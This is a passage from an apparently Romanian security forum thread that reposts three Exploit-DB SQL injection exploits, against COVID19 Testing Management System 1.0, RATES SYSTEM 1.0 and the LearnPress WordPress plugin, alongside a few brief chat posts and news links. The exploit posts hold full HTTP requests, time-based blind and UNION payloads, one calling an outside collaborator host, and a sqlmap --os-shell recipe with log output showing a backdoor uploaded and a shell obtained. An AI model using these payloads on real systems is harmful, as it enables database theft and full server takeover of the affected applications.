GabrielRo

Ciudat.. 🤔

Prezent.

https://www.digi24.ro/stiri/sci-tech/whatsapp-facebook-si-instagram-au-picat-la-nivel-mondial-1689813 🤔🙄

Vulnerable App: # Exploit Title: COVID19 Testing Management System 1.0 - 'searchdata' SQL Injection # Google Dork: intitle: "COVID19 Testing Management System" # Date: 09/08/2021 # Exploit Author: Ashish Upsham # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/ # Version: v1.0 # Tested on: Windows Description: The COVID19 Testing Management System 1.0 application from PHPgurukul is vulnerable to SQL injection via the 'searchdata' parameter on the patient-search-report.php page. ==================== 1. SQLi ==================== http://192.168.0.107:80/covid-tms/patient-search-report.php The "searchdata" parameter is vulnerable to SQL injection, it was also tested, and a un-authenticated user has the full ability to run system commands via --os-shell and fully compromise the system POST parameter 'searchdata' is vulnerable. step 1 : Navigate to the "Test Report >> Search Report" and enter any random value & capture the request in the proxy tool. step 2 : Now copy the post request and save it as test.txt file. step 3 : Run the sqlmap command "sqlmap -r test.txt -p searchdata --os-shell" ---------------------------------------------------------------------- Parameter: searchdata (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: searchdata=809262'+(select load_file('yhj3lhp8nhgr0sb7nf7ma0d0wr2hq6.burpcollaborator.net'))+'') AND (SELECT 4105 FROM (SELECT(SLEEP(5)))BzTl) AND ('Rxmr'='Rxmr&search=Search Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: searchdata=809262'+(select load_file('yhj3lhp8nhgr0sb7nf7ma0d0wr2hq6.burpcollaborator.net'))+'') UNION ALL SELECT NULL,NULL,CONCAT(0x716a767071,0x59514b74537665486a414263557053556875425a6543647144797a5a497a7043766e597a484e6867,0x7176767871),NULL,NULL,NULL,NULL-- -&search=Search [19:14:14] [INFO] trying to upload the file stager on '/xampp/htdocs/' via UNION method [19:14:14] [INFO] the remote file '/xampp/htdocs/tmpuptfn.php' is larger (714 B) than the local file '/tmp/sqlmap_tng5cao28/tmpaw4yplu2' (708B) [19:14:14] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/' - http://192.168.0.107:80/tmpuptfn.php [19:14:14] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/' - http://192.168.0.107:80/tmpbmclp.php[19:14:14] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER os-shell> whoami do you want to retrieve the command standard output? [Y/n/a] y command standard output: 'laptop-ashish\ashish' os-shell> Sursa: https://www.exploit-db.com/exploits/50190

Vulnerable App: # Exploit Title: RATES SYSTEM 1.0 - 'Multiple' SQL Injections # Date: 11-08-2021 # Exploit Author: Halit AKAYDIN (hLtAkydn) # Software Link: https://www.sourcecodester.com/php/14904/rates-system.html # Version: V1.0 # Category: Webapps # Tested on: Linux/Windows # Description: # PHP Dashboards is prone to an SQL-injection vulnerability # because it fails to sufficiently sanitize user-supplied data before using # it in an SQL query.Exploiting this issue could allow an attacker to # compromise the application, access or modify data, or exploit latent # vulnerabilities in the underlying database. # Vulnerable Request: POST /register.php HTTP/1.1 Host: localhost Content-Length: 70 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/register.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=rou48ptlhqkrlt68jpd9ugndgf Connection: close ClientId=0001&email=hltakydn%40pm.me&pwd1=123456&pwd2=123456&register= # Vulnerable Payload: # Parameter: ClientId (POST) # Type: time-based blind # Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) # Payload: ClientId=ojEY' AND (SELECT 4947 FROM (SELECT(SLEEP(10)))haeq) AND 'mdgj'='mdgj&email=&pwd1=iYkb&pwd2=&register=oQCR -------------------------------------------------------------------------------------------------------------------------- # Vulnerable Request: POST /passwordreset.php HTTP/1.1 Host: localhost Content-Length: 61 Cache-Control: max-age=0 sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88" sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/passwordreset.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=a8600labr48ehj6d8716ho0h61 Connection: close loginId=1&clientId=1&email=hltakydn%40pm.me&pwd=123456&reset= # Vulnerable Payload: # Parameter: loginId (POST) # Type: time-based blind # Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) # Payload: loginId=FPDr' AND (SELECT 4535 FROM (SELECT(SLEEP(10)))SJvL) AND 'rtGr'='rtGr&clientId=&email=VXzw&pwd=&reset=xlcX Sursa: https://www.exploit-db.com/exploits/50192

# Exploit Title: WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated) # Date: 07-17-2021 # Exploit Author: nhattruong or nhattruong.blog # Vendor Homepage: https://thimpress.com/learnpress/ # Software Link: https://wordpress.org/plugins/learnpress/ # Version: < 3.2.6.8 # References link: https://wpscan.com/vulnerability/10208 # CVE: CVE-2020-6010 POC: 1. Go to url http://<host>/wp-admin 2. Login with a cred 3. Execute the payload POST /wordpress/wp-admin/post-new.php?post_type=lp_order HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: application/json, text/plain, */* Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost/wordpress/wp-admin/post-new.php?post_type=lp_order Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Content-Length: 128 Origin: http://localhost Connection: close Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Cf0e96afd20e39e4531756b321160a4929f82f20a3fed8d3c3b682e0ece232e08; wordpress_test_cookie=WP+Cookie+check; wp_learn_press_session_bbfa5b726c6b7a9cf3cda9370be3ee91=80e1cb27266ae862f9e71f90a987f260%7C%7C1626703938%7C%7Cbd6b88d1ae5fd4354f09534ad4971bbc; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Ce1092ef2869397bd9701ca7f1c6d0399c89459f5221db89c48a53b39b3e8cc2f; wp-settings-time-3=1626531145 type=lp_course&context=order-items&context_id=32&term=+test&paged=1&lp-ajax=modal_search_items&current_items[]=1 or sleep(1)-- - # Modify current_items[] as you want Sursa: https://www.exploit-db.com/exploits/50137

https://www.vice.com/ro/article/n7b3jm/hackeri-genesis-cookies-boti 🤔

Salut, bun venit!